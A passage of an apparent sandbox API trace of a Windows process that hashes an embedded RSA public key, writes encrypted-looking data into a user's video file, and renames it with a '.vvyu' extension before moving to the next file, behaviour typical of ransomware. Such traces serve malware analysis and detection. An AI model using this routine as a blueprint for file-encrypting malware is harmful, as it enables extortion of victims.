returned 492 [0203.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.500] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.500] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.500] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0203.501] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.501] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.501] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.501] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.501] GetLastError () returned 0x0 [0203.501] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.501] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0203.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.502] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.502] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.502] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x177e0) returned 0x2ea99b0 [0203.502] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1fd8 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37a0 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea2020 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37b8 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37e8 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3848 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3800 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.503] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0203.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3848 [0203.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0203.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3800 [0203.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea37e8 [0203.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0203.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0203.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0203.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0203.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0203.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.506] GetCurrentThreadId () returned 0x66c [0203.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea3de0 [0203.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0203.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.507] GetCurrentThreadId () returned 0x66c [0203.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0203.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0203.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3848 [0203.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37e8 [0203.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0203.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3800 [0203.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37d0 [0203.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3860 [0203.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0203.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3830 [0203.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3818 [0203.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3878 [0203.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3818 [0203.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0203.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0203.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37e8 [0203.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0203.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0203.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3878 | out: hHeap=0x620000) returned 1 [0203.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0203.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0203.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3860 | out: hHeap=0x620000) returned 1 [0203.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0203.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2020 | out: hHeap=0x620000) returned 1 [0203.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.520] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x177dd, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x177dd, lpOverlapped=0x0) returned 1 [0203.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.522] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x177e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.522] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.523] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.523] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.523] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.523] CloseHandle (hObject=0x510) returned 1 [0203.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x2c2df40 [0203.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2ea6a68 [0203.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2df40 | out: hHeap=0x620000) returned 1 [0203.526] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\Ie5lbJNFps_4_oZKKr.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\ie5lbjnfps_4_ozkkr.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\Ie5lbJNFps_4_oZKKr.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\ie5lbjnfps_4_ozkkr.mkv.vvyu")) returned 1 [0203.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.528] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0203.531] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31100e50, ftCreationTime.dwHighDateTime=0x1d899f6, ftLastAccessTime.dwLowDateTime=0x40b006e0, ftLastAccessTime.dwHighDateTime=0x1d89c34, ftLastWriteTime.dwLowDateTime=0x40b006e0, ftLastWriteTime.dwHighDateTime=0x1d89c34, nFileSizeHigh=0x0, nFileSizeLow=0x233d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LA08Fq2WwngfS3W9kC.swf", cAlternateFileName="LA08FQ~1.SWF")) returned 1 [0203.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0203.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.532] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\LA08Fq2WwngfS3W9kC.swf") returned=".swf" [0203.532] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\LA08Fq2WwngfS3W9kC.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\la08fq2wwngfs3w9kc.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.533] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=9021) returned 1 [0203.533] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.536] SetFilePointerEx (in: 